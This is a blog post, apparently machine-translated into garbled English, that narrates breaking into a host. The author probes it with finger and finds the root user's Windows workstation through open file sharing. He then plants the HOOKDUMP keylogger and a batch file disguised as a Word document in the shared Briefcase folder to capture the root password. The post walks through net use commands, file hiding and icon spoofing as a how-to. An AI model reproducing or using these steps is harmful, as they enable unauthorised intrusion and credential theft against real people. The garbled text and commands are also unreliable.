I found a Web site, so conventional intrusion.
Well, it's FINGER open, so I made up a SHELL, the account number on the zzz aaa (bytheway, I found an Internet law, and that is the account number of the length and password strength proportional, if an account has only two or three digits long, it's usually very simple passwords, or vice versa, and call it if it's theorem), an account number does not exist, I didn't try it account. Because I was it opened port attracted, open WWW, I do not believe it is not an error. One even took five CGI and WWW scanner total swept three common mistakes it almost does not exist. : (There are a few errors, but I don't know how to take advantage of that. And around the host go a few times, like Fox found Hedgehog, not below. Or look at the root of information: finger & nbsproot@xxx.xxx.xxx Loginname: rootInreallife: systemPRIVILEGEDaccount Directory:/Shell:/bin/s LastloginFriJul2809: 21onttyp0from202.xx.xx.xx NoPlan. Root often come, that is he 202.xx.xx.xx workstations, since that will never see something? netview\202.xx.xx.xx Sharedresourcesat\202.xx.xx.xx SharenameTypeComment x x My Briefcase Thecommandwascompletedsuccessfully. In the Internet machine open WINDOWS "file and printer sharing" of services, many people tend to treat lightly, this root is no exception. If it's shared drive c and you can write it well, but that's the dream, now open the shared directory is the root directory, even the D drive. Don't worry, take your time. X off those folders are useless, you cannot write, there are some English original, the root is. "My portfolio" attracted my attention, this is a different machine information for synchronization tool, it is clear the root to the regular update of the home page on the host, sometimes on their own machines, sometimes in host series ... So it is very important point: "my portfolio" share generally is writable! I then go in and see. > Netusei: \202.xx.xx.xx > I: > echoasdf > temp.txt, you sure can write. > Deltemp.txt without leaving any traces-hacker habit. > Dir/od/p and see what ... The penultimate row? "X month workplan .doc!" is that it has, since the scheme would not be finished on the losing side, it will open it's again — at least for the next month to write a plan a COPY:-> the hands-on, my goal is to make it the next time you open the error when I run my trap and hidden Trojan. I use a keyboard or transcription software HOOKDUMP, I think it's nice, youneed, also foot ... Sorry, that was used, it should be not only a record of all keystrokes, also a record of what was on or off, press any button, spent what menu ... In short, it's record for you and you stand behind him at his operation more like a computer. You want to ask so many Trojans you why pretend this? whether Chinese glacier, netspy or foreign netbus, BO, are various anti-virus software listed as number one detect objects, and a root machine can not possibly did not install a good antivirus software or HOOKDUMP, small, inconspicuous, but if everyone used but I use it less of a chance ... > copyhookdump. * I: add that upload before you prepare its hookdump.ini file, to run, otherwise hidden root a run screen jump out a window may …. Then in own machine series a BAT file with the same name: X-work plan .BAT > editc: X-work plan .BAT? A HREF = "mailto: @ echo the > @ echo of hookdump attrib-hX, work plan, work programme .doc C:ProgramFilesMicrosoftOfficeWinwordX .doc attrib-htemp.bat deltemp.pi deltemp.bat see? root run the BAT file is to run the Trojan horse, and then call the WINWORD file to open it would like to open this file, and then remove themselves, maybe it's machine where WINWORD, the call will fail, but never mind, it will immediately remove the BAT, he thought it was their mistake. At this point your C drive root directory has a BAT file, which is a square icon, and the WORD file quite different, why run it the root? doesn't matter in this document, at right, point properties, in the "program" column of the selected "change icon" not on the list? WORD icon on your machine C:ProgramFilesMicrosoftOffice. Will "run" to "minimize", "close on exit" on the hook, so as to ensure that the signs at run time. In fact this BAT file into two, there is aPIF file is its icon. Put both files uploaded looks: > copyX month workplan .bati: > copyX .pifi, work plan and put it in: files and their files are hidden: > attrib + hX-work plan .doc > attrib + hX .bat, work plan, root "Briefcase", only one and the same original WORD icon, he never dreamed that has become a BAT file. Then you can breath, let us still and wait ... A few days later, I went to the station, take down the recorded keystrokes record, find out the root password, enter the host.
No comments:
Post a Comment